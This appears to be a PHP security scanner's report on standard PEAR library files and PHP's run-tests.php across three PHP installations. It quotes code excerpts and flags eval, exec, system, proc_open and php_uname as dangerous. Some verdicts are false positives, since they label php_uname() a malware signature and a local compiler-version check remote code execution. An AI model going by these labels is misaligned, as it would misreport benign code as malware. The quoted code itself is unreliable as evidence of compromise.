//opt/php56/share/pear/PEAR.php Size: 34.63 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } public function PEAR_Error( $message = 'unknown error', $code = null, $mode = null, $options = null, $userinfo = null ) { self::__construct($message, $code, $mode, $options, $userinfo); } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { r...
|
|
//opt/php56/share/pear/PEAR/Builder.php Size: 16.73 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($this->config->get('php_prefix') . "php-config" . $this->config->get('php_suffix') . " --prefix"); $this->_harvestInstDir($prefix, $inst_dir . DIRECTORY_SEPARATOR . $prefix, $built_files); chdir($old_cwd); return $built_files; } function phpizeCallback($what, $data) { if ($what != 'cmdoutput') { return; } $this->log(1, rtrim($data)); if (preg_match('/You should update your .aclocal.m4/', $data)) { return; } $matches = array(); if (preg_match('/^\s+(\S[^:]+):\s+(\d{8})/', $data, $matches)) {...
|
|
//opt/php56/share/pear/PEAR/Dependency2.php Size: 49.25 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 276 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php56/share/pear/PEAR/Downloader.php Size: 64.26 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a','return strtolower($a);'); array_walk($this->_installed[$key], $strtolower); } } } function discover($channel) { $this->log(1, 'Attempting to discover channel "' . $channel . '"...'); PEAR::pushErrorHandling(PEAR_ERROR_RETURN); $callback = $this->ui ? array(&$this, '_downloadCallback') : null; if (!class_exists('System')) { require_once 'System.php'; } $tmpdir = $this->config->get('temp_dir'); $tmp = System::mktemp('-d -t "' . $tmpdir . '"'); $a = $this->downloadHttp('http:/...
|
|
//opt/php56/share/pear/PEAR/DependencyDB.php Size: 23.49 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 476 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php56/share/pear/PEAR/Registry.php Size: 73.87 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a','return !empty($a);'); } $package = is_array($package) ? array(strtolower($package[0]), strtolower($package[1])) : strtolower($package); $pkgs = array(); foreach ($path as $name => $attrs) { if (is_array($attrs)) { if (isset($attrs['install-as'])) { $name = $attrs['install-as']; } if (!in_array($attrs['role'], PEAR_Installer_Role::getInstallableRoles())) { continue; } if (!in_array($attrs['role'], PEAR_Installer_Role::getBaseinstallRoles())) { $attrs['baseinstalldir'] = is_a...
| Sign 963e968a Line: 813 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php56/share/pear/PEAR/RunTest.php Size: 35.14 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 5
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2], 0, -1) : $split[2]; $array = array($key => array('operator' => $split[0], 'value' => $value)); retu...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2]...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes, null, $env, array('suppress_errors' => true)); if (!$proc) { return false; } if (is_string($stdin)) { fwrite($pipes[0], $stdin); } fclose($pipes[0]); while (true) { $r = $pipes; $e = $w = null; $n = @stream_select($r, $w, $e, 60); if ($n === 0) { $data .= "\n ** ERROR: process timed out **\n"; proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = frea...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } if (function_exists('proc_get_status')) { $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { retur...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($cmd, $return_value); $out = ob_get_contents(); ob_end_clean(); $section_text['RETURNS'] = (int) trim($section_text['RETURNS']); $returnfail = ($return_value != $section_text['RETURNS']); } else { $returnfail = false; $stdin = isset($section_text['STDIN']) ? $section_text['STDIN'] : null; $out = $this->system_with_timeout($cmd, $env, $stdin); $return_value = $out[0]; $out = $out[1]; } $output = preg_replace('/\r\n/', "\n", trim($out)); if (isset($tmp_post) && realpath($tmp_post) && file_e...
|
|
//opt/php56/share/pear/PEAR/Installer.php Size: 67.79 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$to = $a[to];"); } else { if (!isset($options['soft'])) { $this->log(0, "invalid php-const replacement: $a[to]"); } continue; } } elseif ($a['type'] == 'pear-config') { if ($a['to'] == 'master_server') { $chan = $this->_registry->getChannel($channel); if (!PEAR::isError($chan)) { $to = $chan->getServer(); } else { $to = $this->config->get($a['to'], null, $channel); } } else { $to = $this->config->get($a['to'], null, $channel); } if (is_null($to)) { if (!isset($options['soft'])) { $this->l...
|
|
//opt/php56/share/pear/PEAR/Command/Registry.php Size: 45.17 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a', 'return join(" = ",$a);'), $info[$key][$i]); $info[$key][$i] = implode(', ', $info[$key][$i]); } $info[$key] = implode("\n", $info[$key]); break; } default: { $info[$key] = implode(", ", $info[$key]); break; } } } if ($key == '_lastmodified') { $hdate = date('Y-m-d', $info[$key]); unset($info[$key]); $info['Last Modified'] = $hdate; } elseif ($key == '_lastversion') { $info['Previous Installed Version'] = $info[$key] ? $info[$key] : '- None -'; unset($info[$key]); } else { ...
|
|
//opt/php56/share/pear/PEAR/PackageFile/v2.php Size: 68.33 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('&$i, $k', '$i = $i["handle"];')); $this->_stack->push(__FUNCTION__, 'error', array('handles' => $my), 'package.xml 2.0 has unmatched extra maintainers "%handles%"'); } if ($yours) { array_walk($yours, create_function('&$i, $k', '$i = $i["handle"];')); $this->_stack->push(__FUNCTION__, 'error', array('handles' => $yours), 'package.xml 1.0 has unmatched extra maintainers "%handles%"'); } } function _differentNotes($notes) { $truncnotes = strlen($notes) < 25 ? $notes : substr($note...
|
|
//opt/php56/share/pear/PEAR/ErrorStack.php Size: 33.00 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } public static function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && ...
|
|
//opt/php56/share/pear/pearcmd.php Size: 14.83 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 415 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php56/share/pear/Archive/Tar.php Size: 82.50 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($v_info[4]); $groupinfo = posix_getgrgid($v_info[5]); $v_uname = $userinfo['name']; $v_gname = $groupinfo['name']; } else { $v_uname = ''; $v_gname = ''; } $v_devmajor = ''; $v_devminor = ''; $v_prefix = ''; $v_binary_data_first = pack( "a100a8a8a8a12a12", $v_reduced_filename, $v_perms, $v_uid, $v_gid, $v_size, $v_mtime ); $v_binary_data_last = pack( "a1a100a6a2a32a32a8a8a155a12", $v_typeflag, $v_reduced_linkname, $v_magic, $v_version, $v_uname, $v_gname, $v_devmajor, $v_devminor,...
|
|
//opt/php56/share/pear/OS/Guess.php Size: 10.34 kB Created: 2021-11-01 19:50:24 Modified: 2022-01-04 22:25:29 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 19 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 19 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//opt/php56/lib/php/php/build/run-tests.php Size: 78.10 kB Created: 2021-11-01 19:50:25 Modified: 2022-01-04 22:25:29 Warns: 7 Dangers: 4
| Description | Match |
|---|
Exploit execution Line: 388 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('PHP_AUTOCONF')
| Exploit execution Line: 408 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
system(getenv('CC')
| Exploit execution Line: 410 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('CC')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($section_text['REDIRECTTEST']); $IN_REDIRECT['via'] = "via [$shortname]\n\t"; $IN_REDIRECT['dir'] = realpath(dirname($file)); $IN_REDIRECT['prefix'] = trim($section_text['TEST']); if (count($IN_REDIRECT['TESTS']) == 1) { if (is_array($org_file)) { $test_files[] = $org_file[1]; } else { $GLOBALS['test_files'] = $test_files; find_files($IN_REDIRECT['TESTS']); foreach($GLOBALS['test_files'] as $f) { $test_files[] = array($f, $file); } } $test_cnt += @count($test_files) - 1; $test_idx--; show_r...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $php, $test_cnt, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tested) { $name = $name[0]; } } else if ($redir_tested) { $index = "# $redir_tested: $name"; } else { $index = $name; } $test_idx++; $result = run_test($php, $name, $env); if (!is_array($name) && $result != 'REDIR') { $test_result...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig']; } $code = proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $php, $test_cnt, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tested) { $name = $name[0]; } } else if ($redir_tested) { $index = "# $redir_tested: $name"; } else { $index = $name; } $test_idx...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open() is available. |
| Please check if you disabled it in php.ini. |
+-----------------------------------------------------------+
NO_PROC_OPEN_ERROR;
exit; } if (!defined("PHP_VERSION_ID")) { list($major, $minor, $bug) = explode(".", phpversion(), 3); $bug = (int)$bug; if ($bug < 10) { $bug = "0$bug"; } define("PHP_VERSION_ID", "{$major}0{$minor}$bug"); define("PHP_MAJOR_VERSION", $major); } if (PHP_VERSION_ID < 50300) { define('__DIR__', realpath(dirname(__FILE__))); i...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc, 9); return $data; } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig']; } $code = proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $php, $test_cnt, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec(getenv('PHP_AUTOCONF') . ' --version'); } else { $autoconf = shell_exec('autoconf --version'); } $libtool = shell_exec($CUR_DIR . '/libtool --version'); $sys_libtool_path = shell_exec(__DIR__ . '/build/shtool path glibtool libtool'); if ($sys_libtool_path) { $sys_libtool = shell_exec(str_replace("\n", "", $sys_libtool_path) . ' --version'); } $flags = array('-v', '-V', '--version'); $cc_status = 0; foreach($flags AS $flag) { system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status);...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status); if ($cc_status == 0) { $compiler = shell_exec(getenv('CC') . " $flag 2>&1"); break; } } $ldd = shell_exec("ldd $php 2>/dev/null"); } $failed_tests_data .= "Autoconf:\n$autoconf\n"; $failed_tests_data .= "Bundled Libtool:\n$libtool\n"; $failed_tests_data .= "System Libtool:\n$sys_libtool\n"; $failed_tests_data .= "Compiler:\n$compiler\n"; $failed_tests_data .= "Bison:\n". shell_exec('bison --version 2>/dev/null') . "\n"; $failed_tests_d...
| Sign 963e968a Line: 259 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php73/share/pear/PEAR.php Size: 35.32 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } public function PEAR_Error( $message = 'unknown error', $code = null, $mode = null, $options = null, $userinfo = null ) { self::__construct($message, $code, $mode, $options, $userinfo); } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { r...
|
|
//opt/php73/share/pear/PEAR/Builder.php Size: 18.50 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($this->config->get('php_prefix') . "php-config" . $this->config->get('php_suffix') . " --prefix"); $this->_harvestInstDir($prefix, $inst_dir . DIRECTORY_SEPARATOR . $prefix, $built_files); chdir($old_cwd); return $built_files; } function phpizeCallback($what, $data) { if ($what != 'cmdoutput') { return; } $this->log(1, rtrim($data)); if (preg_match('/You should update your .aclocal.m4/', $data)) { return; } $matches = array(); if (preg_match('/^\s+(\S[^:]+):\s+(\d{8})/', $data, $matches)) {...
|
|
//opt/php73/share/pear/PEAR/Dependency2.php Size: 49.26 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 276 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php73/share/pear/PEAR/DependencyDB.php Size: 23.60 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 478 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php73/share/pear/PEAR/Registry.php Size: 74.03 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 814 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php73/share/pear/PEAR/RunTest.php Size: 35.14 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 5
| Description | Match |
|---|
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2], 0, -1) : $split[2]; $array = array($key => array('operator' => $split[0], 'value' => $value)); retu...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { return array(); } $split = preg_split('/[\s]|=/', $ini_string, -1, PREG_SPLIT_NO_EMPTY); $key = $split[1][0] == '"' ? substr($split[1], 1) : $split[1]; $value = $split[2][strlen($split[2]) - 1] == '"' ? substr($split[2]...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open($commandline, array( 0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w') ), $pipes, null, $env, array('suppress_errors' => true)); if (!$proc) { return false; } if (is_string($stdin)) { fwrite($pipes[0], $stdin); } fclose($pipes[0]); while (true) { $r = $pipes; unset($r[0]); $e = $w = []; $n = @stream_select($r, $w, $e, 60); if ($n === 0) { $data .= "\n ** ERROR: process timed out **\n"; proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { ...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc); return array(1234567890, $data); } else if ($n > 0) { $line = fread($pipes[1], 8192); if (strlen($line) == 0) { break; } $data .= $line; } } if (function_exists('proc_get_status')) { $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=".$stat['stopsig']; } } $code = proc_close($proc); if (function_exists('proc_get_status')) { $code = $stat['exitcode']; } return array($code, $data); } function iniString2array($ini_string) { if (!$ini_string) { retur...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system($cmd, $return_value); $out = ob_get_contents(); ob_end_clean(); $section_text['RETURNS'] = (int) trim($section_text['RETURNS']); $returnfail = ($return_value != $section_text['RETURNS']); } else { $returnfail = false; $stdin = isset($section_text['STDIN']) ? $section_text['STDIN'] : null; $out = $this->system_with_timeout($cmd, $env, $stdin); $return_value = $out[0]; $out = $out[1]; } $output = preg_replace('/\r\n/', "\n", trim($out)); if (isset($tmp_post) && realpath($tmp_post) && file_e...
|
|
//opt/php73/share/pear/PEAR/Installer.php Size: 68.43 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$to = $a[to];"); } else { if (!isset($options['soft'])) { $this->log(0, "invalid php-const replacement: $a[to]"); } continue; } } elseif ($a['type'] == 'pear-config') { if ($a['to'] == 'master_server') { $chan = $this->_registry->getChannel($channel); if (!PEAR::isError($chan)) { $to = $chan->getServer(); } else { $to = $this->config->get($a['to'], null, $channel); } } else { $to = $this->config->get($a['to'], null, $channel); } if (is_null($to)) { if (!isset($options['soft'])) { $this->l...
|
|
//opt/php73/share/pear/PEAR/ErrorStack.php Size: 33.01 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function() code'; } else { $ret['function'] = $funcbacktrace['function']; } } } if (isset($funcbacktrace['class']) && isset($backtrace[1])) { $ret['class'] = $funcbacktrace['class']; } return $ret; } return false; } public static function getErrorMessage(&$stack, $err, $template = false) { if ($template) { $mainmsg = $template; } else { $mainmsg = $stack->getErrorMessageTemplate($err['code']); } $mainmsg = str_replace('%__msg%', $err['message'], $mainmsg); if (is_array($err['params']) && ...
|
|
//opt/php73/share/pear/pearcmd.php Size: 14.49 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 409 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php73/share/pear/Archive/Tar.php Size: 86.26 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($v_info[4]); $groupinfo = posix_getgrgid($v_info[5]); if (isset($userinfo['name'])) { $v_uname = $userinfo['name']; } if (isset($groupinfo['name'])) { $v_gname = $groupinfo['name']; } } $v_devmajor = ''; $v_devminor = ''; $v_prefix = ''; $v_binary_data_first = pack( "a100a8a8a8a12a12", $v_reduced_filename, $v_perms, $v_uid, $v_gid, $v_size, $v_mtime ); $v_binary_data_last = pack( "a1a100a6a2a32a32a8a8a155a12", $v_typeflag, $v_linkname, $v_magic, $v_version, $v_uname, $v_gname, $v_...
|
|
//opt/php73/share/pear/OS/Guess.php Size: 11.25 kB Created: 2021-11-18 14:42:31 Modified: 2022-01-04 22:25:27 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 19 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
| Sign a915f4c2 Line: 19 Dangerous Malware Signature (hash: a915f4c2) |
uname -a
|
|
//opt/php73/lib/php/php/build/run-tests.php Size: 85.22 kB Created: 2021-11-18 14:42:32 Modified: 2022-01-04 22:25:27 Warns: 7 Dangers: 4
| Description | Match |
|---|
Exploit execution Line: 426 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('PHP_AUTOCONF')
| Exploit execution Line: 446 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
system(getenv('CC')
| Exploit execution Line: 448 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
shell_exec(getenv('CC')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($section_text['REDIRECTTEST']); $IN_REDIRECT['via'] = "via [$shortname]\n\t"; $IN_REDIRECT['dir'] = realpath(dirname($file)); $IN_REDIRECT['prefix'] = trim($section_text['TEST']); if (!empty($IN_REDIRECT['TESTS'])) { if (is_array($org_file)) { $test_files[] = $org_file[1]; } else { $GLOBALS['test_files'] = $test_files; find_files($IN_REDIRECT['TESTS']); foreach($GLOBALS['test_files'] as $f) { $test_files[] = array($f, $file); } } $test_cnt += @count($test_files) - 1; $test_idx--; show_redir...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $result_tests_file, $php, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tested) { $name = $name[0]; } } else if ($redir_tested) { $index = "# $redir_tested: $name"; } else { $index = $name; } $test_idx++; $result = run_test($php, $name, $env); if (!is_array($name) && $result != 'REDIR') { $te...
| Function proc_get_status Warning Potentially dangerous function `proc_get_status` [https://www.php.net/proc_get_status] |
proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } proc_close($proc); return $data; } function run_all_tests($test_files, $env, $redir_tested = null) { global $test_results, $failed_tests_file, $result_tests_file, $php, $test_idx; foreach($test_files as $name) { if (is_array($name)) { $index = "# $name[1]: $name[0]"; if ($redir_tes...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open() is available. |
| Please check if you disabled it in php.ini. |
+-----------------------------------------------------------+
NO_PROC_OPEN_ERROR;
exit(1); } if (ini_get('date.timezone') == '') { date_default_timezone_set('UTC'); } putenv('SSH_CLIENT=deleted'); putenv('SSH_AUTH_SOCK=deleted'); putenv('SSH_TTY=deleted'); putenv('SSH_CONNECTION=deleted'); set_time_limit(0); ini_set('pcre.backtrack_limit', PHP_INT_MAX); while(@ob_end_clean()); if (ob_get_level()) echo "...
| Function proc_terminate Warning Potentially dangerous function `proc_terminate` [https://www.php.net/proc_terminate] |
proc_terminate($proc, 9); return $data; } else if ($n > 0) { if ($captureStdOut) { $line = fread($pipes[1], 8192); } elseif ($captureStdErr) { $line = fread($pipes[2], 8192); } else { $line = ''; } if (strlen($line) == 0) { break; } $data .= $line; } } $stat = proc_get_status($proc); if ($stat['signaled']) { $data .= "\nTermsig=" . $stat['stopsig'] . "\n"; } if ($stat["exitcode"] > 128 && $stat["exitcode"] < 160) { $data .= "\nTermsig=" . ($stat["exitcode"] - 128) . "\n"; } proc_close($proc); re...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec(getenv('PHP_AUTOCONF') . ' --version'); } else { $autoconf = shell_exec('autoconf --version'); } $libtool = shell_exec(INIT_DIR . '/libtool --version'); $sys_libtool_path = shell_exec(__DIR__ . '/build/shtool path glibtool libtool'); if ($sys_libtool_path) { $sys_libtool = shell_exec(str_replace("\n", "", $sys_libtool_path) . ' --version'); } $flags = array('-v', '-V', '--version'); $cc_status = 0; foreach($flags AS $flag) { system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status);...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system(getenv('CC') . " $flag >/dev/null 2>&1", $cc_status); if ($cc_status == 0) { $compiler = shell_exec(getenv('CC') . " $flag 2>&1"); break; } } $ldd = shell_exec("ldd $php 2>/dev/null"); } $failed_tests_data .= "Autoconf:\n$autoconf\n"; $failed_tests_data .= "Bundled Libtool:\n$libtool\n"; $failed_tests_data .= "System Libtool:\n$sys_libtool\n"; $failed_tests_data .= "Compiler:\n$compiler\n"; $failed_tests_data .= "Bison:\n". shell_exec('bison --version 2>/dev/null') . "\n"; $failed_tests_d...
| Sign 963e968a Line: 283 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//opt/php71/share/pear/PEAR.php Size: 34.64 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$e = new Exception($this->message, $this->code);throw($e);'); } } public function PEAR_Error( $message = 'unknown error', $code = null, $mode = null, $options = null, $userinfo = null ) { self::__construct($message, $code, $mode, $options, $userinfo); } function getMode() { return $this->mode; } function getCallback() { return $this->callback; } function getMessage() { return ($this->error_message_prefix . $this->message); } function getCode() { return $this->code; } function getType() { r...
|
|
//opt/php71/share/pear/PEAR/Builder.php Size: 16.84 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($this->config->get('php_prefix') . "php-config" . $this->config->get('php_suffix') . " --prefix"); $this->_harvestInstDir($prefix, $inst_dir . DIRECTORY_SEPARATOR . $prefix, $built_files); chdir($old_cwd); return $built_files; } function phpizeCallback($what, $data) { if ($what != 'cmdoutput') { return; } $this->log(1, rtrim($data)); if (preg_match('/You should update your .aclocal.m4/', $data)) { return; } $matches = array(); if (preg_match('/^\s+(\S[^:]+):\s+(\d{8})/', $data, $matches)) {...
|
|
//opt/php71/share/pear/PEAR/Dependency2.php Size: 49.26 kB Created: 2021-11-01 20:26:09 Modified: 2022-01-04 22:25:23 Dangers: 1
| Description | Match |
|---|
